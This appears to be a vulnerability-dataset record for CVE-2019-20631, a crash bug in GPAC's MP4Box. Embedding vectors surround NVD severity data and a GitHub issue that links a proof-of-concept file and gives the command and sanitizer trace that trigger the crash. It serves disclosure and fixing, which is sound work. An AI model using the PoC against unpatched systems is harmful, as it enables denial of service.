0.005158611107617617, 0.003483545035123825, 0.008923804387450218, 0.02515564113855362, -0.0005582010489888489, -0.0035891630686819553, -0.008026977069675922, -0.009679808281362057, 0.013185588642954826, 0.0019178027287125587, -0.009487100876867771, -0.0007814814453013241, 0.010220869444310665, -0.009220276959240437, 0.012125701643526554, -0.008064036257565022, -0.005951673723757267, -0.009412983432412148, 0.0020697445143014193, -0.007148678880184889, 0.026875179260969162, 0.022591160610318184, 0.013556178659200668, -0.001899273251183331, 0.011643934063613415, -0.00478431535884738, 0.0033556914422661066, 0.007589681074023247, 0.02933589555323124, -0.00325748510658741, 0.020100796595215797, -0.002694188617169857, -0.01900384947657585, -0.008019565604627132, -0.018974201753735542, 0.002558923326432705, 0.004291431047022343, -0.010161574929952621, -0.011740287765860558, -0.003994958940893412, -0.0033038088586181402, 0.019819147884845734, 0.027112357318401337, 0.020308326929807663, -0.008694038726389408, -0.009857690893113613, -0.010109691880643368, 0.01065075397491455, -0.002377334050834179, -0.0027720124926418066, -0.005647790152579546, -0.006096203811466694, 0.0031463082414120436, 0.002973983995616436, 0.005128964316099882, 0.00007487073889933527, -0.004165430553257465, -0.00907204020768404, -0.004591608885675669, -0.02749777026474476, 0.00928698293864727, 0.018737025558948517, 0.02410316653549671, 0.004669432528316975, -0.011947818100452423, 0.013793355785310268, -0.005021492950618267, 0.01143640372902155, -0.010843460448086262, 0.0022457747254520655, -0.018010668456554413, 0.003339014947414398, -0.01370441447943449, 0.018025493249297142, 0.0017945815343409777, -0.0019252145430073142, -0.030032604932785034, -0.0046249618753790855, 0.024281049147248268, 0.017773490399122238, 0.014808772131800652, -0.011288167908787727, 0.007070855237543583, -0.002753482898697257, 0.011280756443738937, -0.013823002576828003, -0.011629111133515835, 0.036495693027973175, 0.016439367085695267, 0.008760744705796242, -0.010546988807618618, 0.0017278753221035004, 0.01814408041536808, -0.00012877998233307153, 0.019196556881070137, -0.007474798243492842, -0.003059219568967819, 0.012970645911991596, -0.0027849830221384764, 0.004102430306375027, 0.005766378715634346, 0.011117696762084961, 0.0075785634107887745, -0.006318557541817427, 0.0028053654823452234, 0.013452413491904736, -0.003537280485033989, -0.024785052984952927, -0.0353098064661026, 0.014467829838395119, -0.008479096926748753, -0.005210493691265583, 0.007111620157957077, -0.002447746228426695, -0.019789500162005424, -0.011310403235256672, -0.014208416454494, 0.008723686449229717, 0.011747699230909348, -0.01944855786859989, 0.023465752601623535, 0.006863324902951717, 0.02884671650826931, -0.005566260311752558, -0.0040764887817204, 0.0081159183755517, 0.0038615467492491007, 0.0026867766864597797, -0.002623776439577341, -0.007619328331202269, 0.003707751864567399, -0.004951080773025751, 0.01507559698075056, -0.00787132978439331, -0.00009542689804220572, 0.002827600808814168, -0.008649568073451519, 0.005666319280862808, 0.0034853979013860226, 0.004265489522367716, 0.01821819879114628, 0.0013109617866575718, 0.020723387598991394, 0.009627925232052803, -0.023910459131002426, 0.003983841277658939, -0.007619328331202269, 0.010613694787025452, 0.013437589630484581, -0.012318408116698265, 0.03771122917532921, 0.017536314204335213, 0.004658314865082502, 0.012273937463760376, -0.017032312229275703, 0.0049992576241493225, -0.022946925833821297, 0.008508743718266487, 0.004606432281434536, -0.008086271584033966, 0.03403497487306595, -0.007960271090269089, -0.0013674766523763537, 0.022531865164637566, 0.016543133184313774, 0.004069076851010323, 0.01070263609290123, 0.009442630223929882, -0.045300908386707306, 0.0006804956938140094, -0.005154905375093222, 0.015935365110635757, -0.002653423696756363, 0.0034316624514758587, -0.021494213491678238, -0.006381557788699865, 0.0259709395468235, 0.04957010596990585, 0.0005507892346940935, -0.011962641961872578, -0.010339458473026752, 0.0038800761103630066, -0.00788615271449089, -0.01725466549396515, 0.03539874777197838, -0.007626739796251059, 0.01089534256607294, -0.005614436697214842, -0.008434626273810863, 0.008093683049082756, -0.0027108651120215654, -0.0038652524817734957, 0.004098724108189344, 0.032730501145124435, 0.008427213877439499, 0.009279570542275906, 0.0014119475381448865, -0.0015768599696457386, -0.013511707074940205, 0.01347464881837368, 0.009279570542275906, 0.011629111133515835, -0.020797504112124443, -0.008493920788168907, -0.01762525551021099, -0.024933287873864174, 0.0023810400161892176, 0.006103615742176771, 0.009116511791944504, -0.003433515317738056, -0.012659350410103798, -0.013904532417654991, 0.00025246437871828675, -0.01672101579606533, -0.007989917881786823, 0.01627630740404129, 0.011695817112922668, -0.016884075477719307, -0.006085086148232222, -0.015653716400265694, 0.013578413985669613, 0.008664391934871674, -0.015386892482638359, 0.0064186169765889645, 0.008901569060981274, -0.006811442319303751, 0.007156090810894966, -0.009998515248298645, 0.01394159160554409, 0.0013897120952606201, -0.003587310202419758, 0.006618735380470753, 0.000028271955670788884, -0.01065075397491455, 0.005836790893226862, 0.020812328904867172, -0.011221461929380894, -0.0012034906540066004, 0.01713607646524906, -0.010680400766432285, 0.008953452110290527, -0.0162318367511034, -0.006088791880756617, -0.015727834776043892, 0.014415946789085865, 0.017091605812311172, 0.012348054908216, 0.004650902934372425, -0.0010645195143297315, 0.012585232965648174, 0.0004901051288470626, 0.013793355785310268, 0.0003363103314768523, 0.0079158004373312, -0.007597093004733324, 0.011273344978690147, 0.006552029401063919, 0.028950482606887817, -0.018262669444084167, 0.005051140207797289, 0.011925582773983479, 0.005455083213746548, -0.0181292574852705, -0.012229466810822487, 0.011184402741491795, 0.00125166738871485, 0.008449449203908443, 0.003507633227854967, -0.01280017476528883, -0.008123330771923065, 0.009946633130311966, 0.018737025558948517, 0.001257226220332086, -0.0223243348300457, 0.012444408610463142, 0.004565667361021042, -0.010680400766432285, -0.000661039724946022, -0.00510672852396965, 0.021286683157086372, 0.026741767302155495, 0.0016213307389989495, 0.019344791769981384, -0.010962049476802349, 0.00834568403661251, 0.020575150847434998, -0.024829523637890816, 0.0049992576241493225, 0.008367919363081455, 0.005647790152579546, -0.008901569060981274, -0.00583308469504118, -0.02137562446296215, 0.007004148792475462, -0.04103171452879906, 0.008256742730736732, -0.0051808468997478485, -0.003772605210542679, 0.02142009511590004, 0.006214792374521494, 0.007989917881786823, -0.012940999120473862, -0.01375629659742117, -0.010339458473026752, 0.010131928138434887, -0.02417728491127491, -0.012666762806475163, -0.005573671776801348, -0.018292317166924477, 0.027067886665463448, -0.0015083008911460638, 0.05363176763057709, 0.010191221721470356, 0.012229466810822487, 0.006136968731880188, -0.009902161546051502, -0.006741030141711235, -0.004710197448730469, 0.0006017453270033002, -0.024088343605399132, 0.012896528467535973, -0.0040246061980724335, 0.0021864804439246655, 0.019300321117043495, -0.03157426044344902, -0.005047434475272894, 0.003991253208369017, -0.010057809762656689, 0.0036910753697156906, -0.020278679206967354, -0.006752147804945707, -0.007634151726961136, -0.0024848051834851503, 0.007359915412962437, 0.007122737821191549, 0.017506666481494904, 0.01066557690501213, -0.00833827257156372, -0.005458788946270943, 0.014267710968852043, -0.02564482018351555, 0.013185588642954826, 0.005836790893226862, 0.01999703049659729, -0.0008866363205015659, 0.017921727150678635, 0.010450635105371475, -0.01093981321901083, 0.020293502137064934, -0.013682179152965546, -0.02517046593129635, 0.0012757556978613138, -0.0003432589001022279, -0.014771712943911552, 0.0045100790448486805, 0.01374888513237238, 0.003542839316651225, -0.0008940481347963214, -0.012607468292117119, 0.024814698845148087, -0.02328786812722683, -0.004932551644742489, 0.00676326546818018, -0.0025552173610776663, 0.0038800761103630066, 0.005644083954393864, -0.03809664025902748, -0.012488879263401031, -0.021746214479207993, -0.010747106745839119, -0.018974201753735542, -0.007863917388021946, -0.006841089576482773, 0.007152385078370571, 0.010028162971138954, -0.020767858251929283, 0.005014081485569477, 0.023450927808880806, 0.005266082473099232, -0.01912243850529194, -0.004295136779546738, 0.029558250680565834, -0.008997922763228416, -0.00933145359158516, -0.00837533175945282, -0.02091609314084053, -0.016632074490189552, 0.02146456576883793, -0.004313666373491287, -0.009094275534152985, -0.001101578469388187, -0.00592573219910264, -0.009583454579114914, -0.003059219568967819, 0.003648457583039999, -0.0014369622804224491, -0.007760152220726013, 0.00237918714992702, 0.00792321190237999, -0.02139044925570488, 0.015157126821577549, 0.009479689411818981, -0.0007638784009031951, -0.0318114347755909, 0.002214274602010846, -0.0005053919740021229, 0.008041800931096077, -0.01139193307608366, 0.01066557690501213, 0.0043210783042013645, 0.012192407622933388, -0.005892379209399223, 0.013363471254706383, -0.008938628248870373, 0.0009829896735027432, 0.009620513767004013, -0.023510223254561424, -0.017966197803616524, -0.024414462968707085, -0.005128964316099882, 0.012548173777759075, -0.01673583872616291, 0.030002957209944725, -0.012644527480006218, 0.006703970953822136, 0.0046212561428546906, -0.00559590756893158, -0.01371182594448328, 0.007359915412962437, 0.0062296162359416485, -0.003692928235977888, -0.006185145117342472, -0.002584864618256688, 0.0162318367511034, 0.015401716344058514, 0.0033316032495349646, -0.000737937109079212, 0.017388077452778816, 0.030951667577028275, 0.005362435709685087, -0.006526087876409292, 0.015653716400265694, -0.006563147064298391, -0.003033278277143836, 0.01672101579606533, -0.004765786230564117, 0.015283127315342426, -0.004710197448730469, 0.007030090317130089, 0.009702043607831001, -0.012481467798352242, -0.014423358254134655, 0.05054846033453941, -0.014097239822149277, -0.007908388040959835, -0.006322263740003109, -0.0059739090502262115, -0.015090420842170715, -0.019922912120819092, -0.007052325643599033, -0.011443816125392914, 0.010754519142210484, -0.004806550685316324, 0.020323149859905243, 0.0076934462413191795, 0.0015360951656475663, 0.015431363135576248, -0.014297357760369778, 0.030121546238660812, -0.017862433567643166, 0.011036166921257973, 0.004469314124435186, -0.004951080773025751, -0.017373254522681236, -0.0014777272008359432, 0.0021864804439246655, 0.02564482018351555, -0.003259338205680251, -0.0022513335570693016, 0.027290239930152893, 0.0032741616014391184, -0.013007705099880695, 0.013800767250359058, 0.004613844212144613, -0.01866290718317032, 0.0023347162641584873, -0.004124665632843971, 0.0023865988478064537, -0.0025403937324881554, 0.0028757776599377394, 0.012651938945055008, 0.005158611107617617, -0.011569816619157791, -0.021079152822494507, -0.0015722275711596012, 0.0011386374244466424, 0.0024458933621644974, -0.0218499805778265, -0.012184996157884598, 0.00781203480437398, 0.02085679955780506, -0.0055588483810424805, -0.014252887107431889, 0.01587607152760029, 0.0014527123421430588, -0.017758667469024658, 0.010873107239603996, 0.0038615467492491007, 0.008064036257565022, 0.023895636200904846, -0.013949004001915455, -0.010791577398777008, -0.0037948405370116234, -0.0036855165380984545, 0.029172835871577263 ]
1,718
CVE-2019-20631
2020-03-24T19:15:21.133000
An issue was discovered in libgpac.a in GPAC before 0.8.0, as demonstrated by MP4Box. It contains an invalid pointer dereference in gf_list_count in utils/list.c that can cause a denial of service via a crafted MP4 file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1270" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "123D0430-86B1-40BF-9B43-C782CC2EDDE8", "versionEndExcluding": "0.8.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1270
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Hi, Our fuzzer found an UAF on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_segv_gf_list_count Command: MP4Box -info $PoC ASAN says: ~~~ ==19963==ERROR: AddressSanitizer: SEGV on unknown address 0x00047fff8001 (pc 0x00000047a43d bp 0x60800000bfa0 sp 0x7ffe5b9765b0 T0) #0 0x47a43c in gf_list_count /home/dungnguyen/gueb-testing/gpac-head/src/utils/list.c:641 #1 0x9809d4 in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2185 #2 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #3 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #4 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #5 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #6 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #7 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #8 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #9 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #10 0x7ff2747fe82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #11 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung
SEGV on unknown address on gf_list_count
https://api.github.com/repos/gpac/gpac/issues/1270/comments
1
2019-07-06T00:11:01
2019-07-07T16:00:40Z
https://github.com/gpac/gpac/issues/1270
464,799,484
1,270
true
This is a GitHub Issue repo:gpac owner:gpac Title : SEGV on unknown address on gf_list_count Issue date: --- start body --- Hi, Our fuzzer found an UAF on MP4Box (the latest commit 987169b on master). PoC: https://github.com/strongcourage/PoCs/blob/master/gpac_987169b/PoC_segv_gf_list_count Command: MP4Box -info $PoC ASAN says: ~~~ ==19963==ERROR: AddressSanitizer: SEGV on unknown address 0x00047fff8001 (pc 0x00000047a43d bp 0x60800000bfa0 sp 0x7ffe5b9765b0 T0) #0 0x47a43c in gf_list_count /home/dungnguyen/gueb-testing/gpac-head/src/utils/list.c:641 #1 0x9809d4 in gf_m2ts_process_pmt /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:2185 #2 0x970944 in gf_m2ts_section_complete /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1610 #3 0x971fa2 in gf_m2ts_gather_section /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:1740 #4 0x97991c in gf_m2ts_process_packet /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3446 #5 0x97991c in gf_m2ts_process_data /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:3507 #6 0x986f65 in gf_m2ts_probe_file /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/mpegts.c:4641 #7 0x963fa9 in gf_media_import /home/dungnguyen/gueb-testing/gpac-head/src/media_tools/media_import.c:10998 #8 0x45b475 in convert_file_info /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/fileimport.c:124 #9 0x43ac0c in mp4boxMain /home/dungnguyen/gueb-testing/gpac-head/applications/mp4box/main.c:4804 #10 0x7ff2747fe82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #11 0x421eb8 in _start (/home/dungnguyen/PoCs/gpac_987169b/MP4Box-asan+0x421eb8) ~~~ Thanks, Manh Dung --- end body ---
1,785
[ -0.017999498173594475, 0.033355504274368286, -0.008056705817580223, -0.010640792548656464, 0.03341491147875786, 0.016499539837241173, -0.03525644168257713, 0.053463853895664215, 0.0014238464646041393, 0.026123033836483955, -0.03885040059685707, 0.017836136743426323, 0.020256860181689262, 0.02618243731558323, 0.027355672791600227, 0.0037554646842181683, -0.0173311997205019, 0.020761797204613686, -0.03035558946430683, -0.012920431792736053, 0.042295850813388824, -0.02786060981452465, -0.032999079674482346, 0.045949213206768036, -0.015036709606647491, 0.020063797011971474, -0.023538947105407715, 0.012653112411499023, 0.0033247836399823427, 0.04476112872362137, -0.012564006261527538, 0.02125188335776329, -0.011019494384527206, 0.010477430187165737, 0.04431559517979622, -0.013766942545771599, 0.05349355936050415, 0.05174113065004349, 0.00674609886482358, 0.0069762906059622765, 0.007670578081160784, -0.0387909971177578, -0.05512717738747597, 0.012363516725599766, -0.0023483256809413433, -0.004106320906430483, 0.021147925406694412, -0.007473801262676716, -0.04119687154889107, 0.014442666433751583, 0.023152818903326988, -0.018534136936068535, -0.02992490865290165, -0.0441373847424984, -0.002840267261490226, -0.032375335693359375, 0.03709797561168671, 0.004659523721784353, -0.011086324229836464, 0.03665244206786156, -0.0208954568952322, 0.015771837905049324, -0.0408998504281044, 0.03106844052672386, 0.02151920273900032, 0.02099941484630108, 0.0012762639671564102, 0.01589064672589302, 0.003681209171190858, 0.03445448353886604, 0.004258544649928808, -0.03739499673247337, 0.005777066573500633, 0.03457329422235489, 0.030385291203856468, -0.021029116585850716, 0.030414992943406105, 0.009319047443568707, -0.020212307572364807, 0.011227409355342388, -0.031573377549648285, 0.028335843235254288, -0.018474731594324112, 0.022633032873272896, -0.012155601754784584, -0.00736613105982542, -0.012489750981330872, -0.08322539925575256, -0.029523929581046104, -0.052305471152067184, 0.0026230704970657825, 0.022900352254509926, 0.008725004270672798, 0.031929802149534225, 0.021905329078435898, 0.010054174810647964, -0.01531145442277193, -0.017450008541345596, -0.04508785158395767, -0.007462663110345602, -0.04036521166563034, -0.033890143036842346, -0.0025024055503308773, 0.004251119215041399, -0.0014192054513841867, 0.018786605447530746, 0.002725171623751521, -0.009445280767977238, 0.0364445298910141, 0.1406693458557129, 0.023108266294002533, -0.0075294929556548595, -0.01151700597256422, -0.0016326896147802472, 0.03902861475944519, 0.019766775891184807, 0.003998650703579187, -0.002686187392100692, -0.03285056725144386, -0.04259287193417549, 0.006501056253910065, -0.006872333120554686, -0.00406176783144474, 0.02064298838376999, -0.025944821536540985, 0.045147255063056946, -0.005539449397474527, 0.010774452239274979, -0.027756651863455772, -0.010165558196604252, -0.048028364777565, -0.020940009504556656, 0.012073921039700508, -0.026226991787552834, 0.007670578081160784, -0.010470004752278328, -0.023019159212708473, 0.02579631097614765, 0.010811579413712025, 0.017999498173594475, -0.06884956359863281, -0.03391984477639198, 0.02634580060839653, -0.008732429705560207, -0.012140750885009766, -0.014487219974398613, -0.006898322608321905, 0.005543162114918232, -0.011799176223576069, -0.012148176319897175, 0.01295013353228569, -0.017301497980952263, 0.04092955216765404, 0.00324867176823318, 0.04116716980934143, 0.01348477229475975, 0.015771837905049324, 0.008049280382692814, 0.012170452624559402, -0.0414641909301281, -0.023182522505521774, -0.024355756118893623, 0.02466762810945511, -0.0310981422662735, -0.026954693719744682, -0.005695385858416557, 0.017806435003876686, 0.004678087309002876, -0.013172900304198265, 0.022276606410741806, 0.005962705239653587, -0.01509611401706934, 0.03870189189910889, 0.04790955409407616, -0.04241465777158737, 0.01617281697690487, 0.019588563591241837, 0.06510709226131439, -0.024400310590863228, 0.0038315763231366873, -0.014487219974398613, 0.008427983149886131, 0.0023613201919943094, -0.0017310780240222812, -0.0168856680393219, -0.013447645120322704, 0.021548904478549957, -0.02581116184592247, 0.024533968418836594, -0.02591511979699135, 0.02018260583281517, 0.001456333207897842, 0.0017255088314414024, -0.008056705817580223, 0.055394496768713, -0.019529158249497414, -0.03917712718248367, -0.012378367595374584, -0.00589587539434433, -0.007477514445781708, 0.008821535855531693, -0.015519369393587112, -0.008420557714998722, 0.004945406690239906, -0.016588646918535233, -0.02312311716377735, -0.020598435774445534, 0.03463269770145416, -0.0034343102015554905, -0.00007674987136851996, -0.014702560380101204, -0.040781039744615555, 0.01893511600792408, 0.014680284075438976, -0.005751077085733414, 0.008851238526403904, 0.008955195546150208, 0.016544092446565628, 0.00914825964719057, -0.017390605062246323, 0.03276146203279495, 0.018548987805843353, 0.02555869333446026, -0.005684247240424156, -0.05233517289161682, -0.025425033643841743, 0.009259643033146858, 0.01397485751658678, -0.03564257174730301, 0.003942959476262331, -0.010974941775202751, -0.0034751505590975285, -0.0023613201919943094, 0.014427815563976765, 0.016915369778871536, 0.0007026413222774863, -0.008078983053565025, -0.009304195642471313, 0.013009537942707539, 0.012363516725599766, 0.0024262936785817146, 0.035404954105615616, -0.03083082288503647, -0.014940177090466022, 0.015519369393587112, 0.06760207563638687, -0.016009453684091568, -0.026464609429240227, -0.022633032873272896, 0.025751756504178047, -0.007325290702283382, -0.028276439756155014, -0.0026434906758368015, 0.00417315075173974, -0.0003016623668372631, 0.0036570762749761343, 0.011903133243322372, 0.006192896515130997, 0.0013208171585574746, -0.02751903422176838, 0.01276449579745531, -0.019053924828767776, -0.030073419213294983, -0.004837736487388611, 0.004291959572583437, -0.017628220841288567, -0.01945490390062332, 0.023613203316926956, 0.011925410479307175, -0.03261295333504677, 0.026286395266652107, -0.004254831932485104, -0.03436537832021713, -0.015653029084205627, -0.0018981525208801031, 0.00834630150347948, 0.022038988769054413, 0.022796394303441048, 0.017539115622639656, 0.005119906738400459, -0.011130877770483494, 0.0106704942882061, -0.02162315882742405, 0.015653029084205627, 0.0052609918639063835, -0.01678171008825302, -0.01330655999481678, -0.010900686495006084, -0.01597975194454193, 0.012296686880290508, 0.026048779487609863, 0.025929970666766167, -0.030132822692394257, 0.03151397407054901, 0.005617417395114899, 0.03270205855369568, -0.00162433588411659, 0.030147673562169075, -0.011309091001749039, 0.022024137899279594, -0.008918068371713161, -0.009215089492499828, -0.006270864512771368, -0.0030630333349108696, -0.026954693719744682, 0.010841282084584236, -0.03314759209752083, -0.004900853615254164, -0.0022982032969594, 0.014487219974398613, 0.03492971882224083, -0.050760962069034576, -0.02223205380141735, -0.013291708193719387, -0.03745440021157265, -0.01670745573937893, 0.0015732853207737207, -0.023895373567938805, -0.019053924828767776, 0.005832758266478777, -0.02454882115125656, 0.0017830567667260766, -0.03932563588023186, 0.005706524010747671, 0.019350945949554443, 0.001064636162482202, -0.03019222803413868, 0.026642821729183197, -0.08233433961868286, 0.02080634981393814, 0.019529158249497414, -0.016588646918535233, 0.004796896129846573, -0.04704819247126579, 0.005996119696646929, -0.03439508005976677, -0.026553714647889137, 0.01957371085882187, 0.024860693141818047, -0.006671843584626913, 0.0007091386360116303, 0.04404827579855919, -0.0023204798344522715, -0.004035778343677521, -0.022826096042990685, -0.0229597557336092, -0.004525864031165838, -0.005338959861546755, 0.016380731016397476, 0.002227660734206438, 0.0009435071260668337, 0.021326137706637383, 0.019499456509947777, 0.0387909971177578, 0.007871068082749844, 0.000854400685057044, -0.015653029084205627, -0.02304886281490326, 0.01228183601051569, -0.017167838290333748, 0.00892549380660057, -0.009385877288877964, -0.023449841886758804, 0.04170180857181549, 0.015252050012350082, 0.01473968755453825, 0.0008906001457944512, -0.007729982491582632, -0.0015278039500117302, -0.01859354041516781, -0.03475150465965271, 0.054265812039375305, -0.021147925406694412, 0.009987344965338707, -0.013016963377594948, -0.025885416194796562, 0.018742050975561142, 0.03056350350379944, -0.01742030680179596, -0.01249717641621828, -0.026212140917778015, -0.0007068181876093149, 0.024415161460638046, -0.06100820004940033, 0.016410432755947113, 0.034513890743255615, -0.04538487270474434, 0.05218666419386864, -0.03019222803413868, -0.01706388033926487, -0.03207831457257271, 0.03742469847202301, -0.02919720485806465, -0.05581032484769821, -0.001835035509429872, 0.0020680115558207035, -0.033177293837070465, -0.010789303109049797, 0.012326388619840145, -0.03840487077832222, 0.03888010233640671, -0.0018526711501181126, 0.00047152151819318533, 0.0054354919120669365, -0.009385877288877964, 0.02705865167081356, -0.004418193828314543, -0.02080634981393814, 0.03974146768450737, -0.009794281795620918, 0.0340980589389801, -0.027132906019687653, -0.007937896996736526, 0.010885834693908691, 0.045681893825531006, 0.020568734034895897, -0.006048098672181368, 0.0024745597038418055, -0.03938503935933113, 0.014903049916028976, -0.029241759330034256, -0.005145896226167679, 0.012578857131302357, 0.02991005778312683, 0.013870900496840477, 0.019766775891184807, -0.01713813655078411, 0.014301581308245659, 0.011279388330876827, -0.038820698857307434, 0.003150283358991146, 0.00043741046101786196, -0.006501056253910065, 0.014301581308245659, 0.010217537172138691, -0.04392946884036064, -0.017286647111177444, -0.0527213029563427, -0.016558943316340446, -0.024311203509569168, -0.03528614342212677, 0.0358801893889904, -0.01201451662927866, 0.01779158227145672, 0.01966281794011593, -0.047285810112953186, -0.025618096813559532, -0.009593792259693146, 0.01811830699443817, -0.008049280382692814, 0.019009370356798172, 0.007618599571287632, 0.009950217790901661, -0.01635102927684784, -0.0034398792777210474, 0.0004877648607362062, -0.007251035422086716, 0.003991225268691778, 0.04787985235452652, 0.021029116585850716, 0.018281668424606323, 0.026033926755189896, 0.005751077085733414, 0.011123452335596085, 0.00536123663187027, 0.047998663038015366, 0.0053946515545248985, -0.0198410302400589, -0.00025316435494460166, -0.010885834693908691, 0.01742030680179596, 0.017999498173594475, 0.014279305003583431, -0.013106070458889008, -0.01945490390062332, 0.025885416194796562, -0.00042812852188944817, -0.00435507670044899, -0.011932835914194584, -0.03546435758471489, -0.015608475543558598, -0.0015565778594464064, -0.01661834865808487, 0.029449673369526863, 0.009801707230508327, -0.04182061553001404, -0.015133241191506386, -0.004462746903300285, -0.008836387656629086, 0.002905240748077631, 0.006062949541956186, 0.006675556302070618, -0.025439884513616562, -0.012809048406779766, 0.03118724934756756, -0.004254831932485104, -0.0003023585304617882, 0.009029450826346874, 0.03421686589717865, 0.02786060981452465, 0.025499289855360985, -0.03798903897404671, -0.0019083626102656126, 0.0007764325710013509, 0.014257027767598629, -0.0328802727162838, -0.031009037047624588, 0.014279305003583431, -0.005780779290944338, -0.03885040059685707, -0.030741717666387558, -0.01886085979640484, -0.011880856938660145, -0.057028111070394516, -0.012645686976611614, -0.015786688774824142, 0.01067791972309351, 0.0009810988558456302, 0.015341156162321568, 0.0157124325633049, -0.020865755155682564, -0.003835289040580392, 0.002660198137164116, 0.04583040624856949, 0.023702308535575867, 0.007213907781988382, 0.0003237069468013942, 0.00763345044106245, 0.015920348465442657, -0.03115754760801792, -0.021326137706637383, -0.015563922002911568, -0.02339043654501438, 0.03772171959280968, -0.023004308342933655, 0.00002643896732479334, -0.012541729025542736, 0.0073549929074943066, -0.001965910429134965, -0.02395477704703808, -0.025350777432322502, 0.04868181049823761, -0.030860526487231255, 0.006148343440145254, -0.025335926562547684, 0.04387006536126137, -0.008450259454548359, 0.025499289855360985, -0.005810481496155262, -0.01169521827250719, -0.003961523063480854, -0.012964985333383083, 0.007574046030640602, 0.0025877992156893015, 0.010172983631491661, -0.00712480116635561, -0.011992239393293858, 0.0294793751090765, 0.014992156066000462, 0.004477597773075104, 0.008249769918620586, 0.00023077172227203846, -0.00916311051696539, -0.024251798167824745, -0.010470004752278328, 0.01196996308863163, -0.015756987035274506, 0.03626631572842598, -0.03888010233640671, 0.003361911280080676, 0.0058513218536973, 0.0025506713427603245, 0.016291625797748566, -0.007715131621807814, -0.00019689270993694663, -0.00021093161194585264, -0.011487303301692009, -0.00974230282008648, -0.013135772198438644, -0.015489666722714901, 0.02160830795764923, -0.042117636650800705, -0.015950050204992294, 0.02374686300754547, 0.020657839253544807, -0.016915369778871536, 0.011531856842339039, 0.0061631943099200726, -0.0019621977116912603, 0.004915704485028982, -0.00010070882854051888, 0.014234751462936401, -0.009712600149214268, -0.028974439948797226, -0.0034881453029811382, -0.012437772005796432, -0.00623002415522933, 0.016677752137184143, 0.021311286836862564, -0.00560256652534008, -0.027563588693737984, 0.01802919991314411, -0.008427983149886131, -0.05687960237264633, -0.05010751262307167, 0.024637926369905472, 0.02901899255812168, 0.005183023866266012, -0.04003848880529404, 0.029434822499752045, 0.008784408681094646, 0.0276972483843565, 0.057384539395570755, -0.012667963281273842, 0.008041854947805405, -0.006055524107068777, 0.031840696930885315, -0.010076452046632767, 0.01902422122657299, 0.023375585675239563, 0.021415244787931442, -0.025766607373952866, 0.012215006165206432, -0.018355924636125565, 0.01695992238819599, 0.03923653066158295, 0.004392204340547323, -0.02786060981452465, -0.0014414821052923799, -0.01075960136950016, -0.04793925583362579, 0.024162692949175835, -0.0014813942834734917, -0.030236780643463135, -0.041048359125852585, 0.03430597484111786, 0.04110776633024216, -0.0006543752970173955, -0.023375585675239563, 0.0013969289138913155, 0.018786605447530746, -0.0030407567974179983, -0.027830906212329865, 0.003731331555172801, -0.025053756311535835, 0.0045332894660532475, -0.0022759265266358852, -0.014910475350916386, 0.006148343440145254, 0.03763261437416077, -0.022647883743047714, -0.010581388138234615, 0.016499539837241173, 0.006749811582267284, 0.022291457280516624, -0.011583835817873478, 0.045503683388233185, 0.04669176787137985, 0.0061631943099200726, -0.0013867187080904841, -0.013566453009843826, -0.04966198280453682, -0.0063191307708621025, -0.0067795137874782085, -0.012051643803715706, -0.019796477630734444, -0.023345883935689926, -0.012705091387033463, -0.0055283112451434135, 0.00431052315980196, 